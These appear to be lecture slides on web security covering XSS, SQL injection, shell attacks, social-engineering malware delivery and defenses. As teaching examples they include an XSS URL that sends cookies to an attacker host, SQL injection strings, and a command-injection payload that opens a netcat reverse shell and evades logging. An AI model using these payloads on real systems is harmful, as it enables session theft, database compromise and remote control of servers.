Web security

Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks

Introduction Average user spends 16 h/month online (32 h/month in U.S.) [1] People spend much time interacting with Web, Web applications (apps) Their (lack of) security has major impact Interaction via Web browser ⋯ ⋯ Source: [2], [3]

Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 80% of vulnerabilities discovered are in web apps Independent security audit Regulatory compliance * SANS/TippingPoint, based on March-August 2009 data

Web Browser Workflow Source: [4]

HyperText Transfer Protocol (HTTP) Browsers use HTTP to fetch Web content Request/response based protocol Stateless HTTP requests: [4] For a webpage, script, image, file, etc. Usually expose info about client, browser [5] HTTP response: [4] A file (HTML, image, etc.) Can redirect to another webpage

Web Applications Big trend: software as a (Web-based) service Online banking, shopping, government, etc. Cloud computing Applications hosted on Web servers Written in a mixture of PHP, Java, Perl, Python, C, ASP Security is rarely the main concern Poorly written scripts with inadequate input validation Sensitive data stored in world-readable files

Typical Web Application Design Runs on a Web server or application server Takes input from Web users (via Web server) Interacts with back-end databases and third parties Prepares and outputs results for users (via Web server) Dynamically generated HTML pages Contain content from many different sources, often including regular users Blogs, social networks, photo-sharing websites… Web advertisements, usually third party A webpage can have content coming from 10-20 different domains

Two Sides of Web Security Web browser (front end) Can be attacked by any website it visits Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data Web application (back end) Runs at website Banks, online merchants, blogs, Google Apps, etc. Written in Javascript, PHP, ASP, JSP, Ruby, … Many potential bugs: XSS, SQL injection, XSRF Attacks lead to stolen credit cards, defaced sites, etc.

Basics – Browser Security Web browser stores info, e.g., cookies, user credentials, etc. Same origin policy (SOP): only code running on “the same” website as other code can access latter’s methods/properties [11] Origin determined by app protocol, domain name, and port # SOP critical to browser security

Basics – Browser Security URL Outcome Reason http://www.example.com/dir/page.html Success Same protocol and host http://www.example.com/dir2/other.html http://www.example.com:81/dir/other.html Failure Different port https://www.example.com/dir/other.html Different protocol http://en.example.com/dir/other.html Different host http://example.com/dir/other.html http://v2.www.example.com/dir/other.html

Chicago Tribune Home Page

How Are Legitimate Web Sites Compromised? SQL Injection Attacks Malicious Advertisements Many Web sites today display advertisements hosted by third-party advertising sites Volume of ads published automatically makes detection difficult Random appearances further compounds the detection Search Engine Result Redirection Attacks on the backend virtual hosting companies Cross-site scripting (XSS) attacks Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)

We need application layer protection as well!

Attacks Types

Denial-of-Service (DoS) Denial of Service (DoS) attack: Attacker causes web server to be unavailable. How attack is performed: Attacker frequently requests many pages from your web site. distributed DoS (DDoS): DoS using lots of computers Your server cannot handle this many requests at a time, so it turns into a smoldering pile of goo (or just becomes very slow). Problems that this attack can cause: Users cannot get to your site. Online store's server crashes -> store loses potential revenue. Server may crash and lose or corrupt important data. All the bandwidth used by the DoSers may cost you $$$.

Packet sniffing packet sniffing: Listening to traffic sent on a network. Many internet protocols (http, aim, email) are unsecure. If an attacker is on the same local network (LAN) as you, he can: read your email/IMs as you send them see what web sites you are viewing grab your password as it's being sent to the server solutions: Use secure protocols (ssh, https) Encryption Don't let creeps on your LAN/wifi

Password cracking password cracking: Guessing the passwords of privileged users of your system. How attack is performed: brute force attack: Attacker uses software that sequentially tries every possible password. dictionary attack: Attacker uses software that sequentially tries passwords based on words in a dictionary. every word in the dictionary combinations of words, numbers, etc. What you can do about it: Force users to have secure passwords. Block an IP address from logging in after N failed attempts.

Phishing/social engineering phishing: Masqueraded mails or web sites. social engineering: Attempts to manipulate users, such as fraudulently acquiring passwords or credit card numbers. Problems: If trusted users of your system are tricked into giving out their personal information, attackers can use this to log in as those users and compromise your system.

Privilege escalation privilege escalation: Attacker becomes able to run code on your server as a privileged user. Example: Perhaps normal users aren't able to directly query your database. But an attacker may find a flaw in your security letting him run as an administrator and perform the query. Once you're running as root, You own the server. You can do anything you want!

Cross-site scripting (XSS) cross-site scripting: Causing one person's script code to be executed when a user browses to another site. Example: Visit google.com, but evil.com's JavaScript runs. How attack is performed: Attacker finds unsecure code on target site. Attacker uses hole to inject JavaScript into the page. User visits page, sees malicious script code.

Cross-site scripting (XSS) Attacker goal: their code into browser XSS forces a website visitor to execute malicious code in his/her browser Count for roughly 80% of all documented security vulnerabilities

XSS Risks XSS abuses render engines or plug-ins Steal browser cookies Steal session info for replay attack Malware or bot installation Redirect or phishing attempt

XSS Detection A client usually is not supposed to send scripts to servers If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred A sanitized script could look like &ls;SCRIPT>… Any user input must be preprocessed before it is used inside HTML

XSS Example 2 Trudy sends a link of the following URL to Bob that will take him to a personalized page: http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script> A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

SQL Injection Malicious SQL statements run on a database and thus attack the server Causing undesired SQL queries to be run on your database. Often caused when untrusted input is pasted into a SQL query PHP: "SELECT * FROM Users WHERE name='$name';"; specify a user name of: x' OR 'a'='a SELECT * FROM Users WHERE name='x' OR 'a'='a';

SQL Injection Example Trudy accesses Bob’s website; in which he does not validate input on his sign in form Runs a SQL statement like the following: select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; Set username to ' or '1'='1 select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’; Effect: picks any row where the username is blank and the password matches or any row where true. Add “limit 1” to pick the first row In the password field, she types as her password: X” OR “x”=“x Manipulates the server into running the following SQL command: SELECT * FROM ACCOUNTS WHERE username = “USER_NAME” AND password=“X” OR “x”=“x”; Selects all account information

SQL Injection Detection Input validation on any outgoing SQL statements from the web server to the database server Filter Apostrophes, semicolons, percent symbols, hyphens, underscores, … Any character that has special meanings must be escaped, .e.g., convert ’ into \’ Only works for string inputs Different databases have different rules for escaping Check the data type (e.g., make sure it’s an integer)

Control an actual machine like a web server Shell Attacks Control an actual machine like a web server

Shell Attacks Inject commands into scripts that use Linux utilities E.g., with “;” as command separator in UNIX/LINUX CGI programs like perl can use command-line programs (e.g. grep, ls) Unsanitized input as arguments can lead to command execution.

Shell Attacks Demo Search engine in MiniBB webserver executes system("echo $user_usr " . $phrase . " >>/tmp/searchlogs"); Put phrase as: >/dev/null; id; echo randomdata Hide user ID Store random data in logs to evade detection We can even get a remote shell ! >/dev/null; nc cal 5000 -e /bin/sh

Defense Approaches Web firewall/IDS Static code analysis ModSecurity for Apache Commercial: SecureSphere from Imperva Static code analysis Open source: Nikto Commercial: Acutenix Web Vulnerability Scanner N-stalker Education on good coding HTML encoding on input (server-side) Input validation/filtering

GETTING ONTO A USER’S COMPUTER Source: Web Based Attacks, Symantec 2009

Automatic Attack Exposure Techniques used to deliver malware from Websites to a users computer. Exposure Browsing a website No user interaction is required Executable content is automatically downloaded

“Click Jacking”

Social Engineering People are tricked into performing actions they would not otherwise want to perform Source: Web Based Attacks, Symantec 2009

Types of Social Engineering Attacks Fake Codec Malicious Peer-to-Peer (P2P) Files Malicious Advertisements Fake Scanner Web Page Blog Spam Other Attack Vectors

Fake Codec User is prompted to install a missing codec Codec is actually malware code Usually a trojan horse

Malicious Peer-to-Peer (P2P) Files Malware authors bind content into popular applications Files named after celebrities, popular bands Uploaded to popular P2P sites where they are downloaded by unsuspecting users Openly available how-to materials on the internet Details how to build and distribute malware Pay-Per-Install malware

Fake Scanner Web Page Create a web site or product that misrepresents the truth JavaScript pop-ups notifying of false need to install operating system updates Tools that claim to scan for and remove adult images, etc. Source: Web Based Attacks, Symantec 2009

Blog Spam Alluring links posted on blogs Links embedded in blog comments Direct users to sites that leverage social engineering tricks or browser exploits to spread malware

User input attacks Bypassing client-side input restrictions and validation maxlength limits on an input text field choices not listed in a select box hidden input fields modifying or disabling client-side JavaScript validation code

Guessing files/directories security through obscurity: Many reachable files/resources are hidden only by the fact that there is no link to them. Try common file/folder/commands to see what happens: /etc/passwd , /etc/shadow , cat, ls, grep guess file names based on others page11.php --> page12.php loginfailure.jsp --> loginsuccess.jsp accounts/fred.html --> accounts/sue.html brute force / web spiders port scanners

Other attacks Attacking GET parameters Attacking hidden input fields Attacking cookies Cross-site request forgery (CSRF) ...

Other Attack Vectors Spam Pirated software sites Emails contain links directing people to drive by download, fake scanner/codec, and malware sites Pirated software sites Pirated versions of software are bundled with or comprised solely of trojan horses

Thinking like an attacker: Finding vulnerabilities

Panning for gold View Source, and look for: HTML comments script code other sensitive information in code: IP/email addresses, SQL queries, hidden fields,... watch HTTP requests/responses look for hidden pages, files, parameters to target error messages sent to your browser by app 200: OK 400: Invalid request 403: Forbidden 404: File not found 500: Internal server error

Input forms Forms let users pass parameters to the web server. Parameters are passed using GET or POST requests. GET: parameters are contained in the request URL. http://www.google.com?q=Stephen+Colbert&lang=en POST: parameters are contained in the HTTP packet header. harder for the user to see, but no more secure than GET Forms provide a rich attack ground...

Form validation validation: Examining form parameters to make sure they are acceptable before/as they are submitted. nonempty, alphabetical, numeric, length, ... client-side: HTML/JS checks values before request is sent. server-side: JSP/Ruby/PHP/etc. checks values received. Some validation is performed by restricting the user's choices. select boxes input text boxes with maxlength attribute key event listeners that erase certain key presses

How to Protect Yourself Update and Patch Software Get latest OS, Browser, Application patches Browswer Plug-in updates often forgotten Endpoint Protection Software Anti-virus software for signature based detection and behavioral monitoring Update Protection Software Subscription Could miss 70,000 new unique virus variants for one week Be Suspicious Avoid things that seem too good to be true Use safe search functionality in browsers Adopt Strong Password Policy

Sources Sources Chapter 7: Web Development & Design Foundations with HTML5, 7th Edition.